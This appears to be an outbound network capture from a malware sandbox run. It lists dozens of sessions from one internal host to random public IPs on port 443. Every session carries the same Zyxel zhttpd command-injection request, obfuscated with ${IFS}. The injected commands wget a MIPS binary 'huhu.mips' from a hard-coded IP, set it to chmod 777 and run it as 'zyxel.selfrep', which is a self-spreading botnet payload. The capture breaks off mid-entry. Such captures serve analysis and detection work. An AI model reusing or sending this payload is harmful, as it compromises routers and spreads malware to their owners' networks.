                                                      Feb 2, 2024 06:35:52.606591940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4176192.168.2.1436018151.45.174.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606678009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4177192.168.2.1449880175.123.90.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606739044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4178192.168.2.14548724.89.93.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606761932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4179192.168.2.144058835.171.36.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606791973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4180192.168.2.144082032.217.137.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606829882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4181192.168.2.1434094213.32.13.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606883049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4182192.168.2.1451614173.241.22.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606923103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4183192.168.2.1445882146.184.203.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606983900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4184192.168.2.1441898163.19.227.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606988907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4185192.168.2.1435014204.252.169.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607048035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4186192.168.2.145357647.182.172.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607079029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4187192.168.2.1438550155.7.147.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607152939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4188192.168.2.1442824162.110.249.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607182026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4189192.168.2.1446442217.102.211.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607218027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4190192.168.2.1454730144.226.125.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607285023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4191192.168.2.1448234216.252.1.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607312918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4192192.168.2.144411096.45.238.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607364893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4193192.168.2.146057881.249.151.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607383013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4194192.168.2.1460960129.49.104.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607433081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4195192.168.2.145678620.40.132.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607445955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4196192.168.2.1446870208.30.158.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607494116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4197192.168.2.144367260.38.48.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607536077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4198192.168.2.1459176148.28.73.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607584000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4199192.168.2.1434064132.101.152.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607634068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4200192.168.2.144723889.191.225.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607680082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4201192.168.2.1460174184.38.218.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607723951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4202192.168.2.1456434198.139.192.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607759953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4203192.168.2.143819893.27.101.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607822895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4204192.168.2.145842494.131.254.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607851028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4205192.168.2.145446866.34.41.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607902050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4206192.168.2.1435362157.49.229.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607939959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4207192.168.2.1455550209.237.139.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.607980967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4208192.168.2.1441718217.166.154.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608047009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4209192.168.2.1450898122.159.161.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608063936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4210192.168.2.1438434170.192.251.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608113050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4211192.168.2.1442770122.149.7.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608153105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4212192.168.2.144796227.94.95.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608177900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4213192.168.2.1446254210.89.175.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608243942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4214192.168.2.1454558190.235.85.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608253002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4215192.168.2.1452242196.217.128.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608294010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4216192.168.2.143838669.204.45.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608330011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4217192.168.2.1441810163.179.237.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608370066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4218192.168.2.1451860109.247.193.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608414888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4219192.168.2.143849868.253.75.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608458996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4220192.168.2.145380288.79.200.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608478069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4221192.168.2.1439490171.149.227.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608515978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4222192.168.2.1452796119.223.118.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608565092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4223192.168.2.143420066.65.104.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608609915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4224192.168.2.1453888113.128.219.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608659983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4225192.168.2.145679464.207.191.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608695030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4226192.168.2.143511686.179.117.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608735085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4227192.168.2.144486664.217.240.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608788967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4228192.168.2.1450028219.128.207.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608819008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4229192.168.2.1433968146.246.203.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608884096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4230192.168.2.144497848.205.103.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608932018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4231192.168.2.145752064.23.47.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608953953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4232192.168.2.143616836.72.147.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.608990908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4233192.168.2.1457212191.55.120.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609021902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4234192.168.2.1441256186.148.230.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609052896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4235192.168.2.1455824131.59.219.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609091043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4236192.168.2.145548287.203.237.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609143019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4237192.168.2.143462272.120.145.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.609184980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4238192.168.2.1446724217.21.248.177443
                                                      TimestampBytes transferredDirectionData
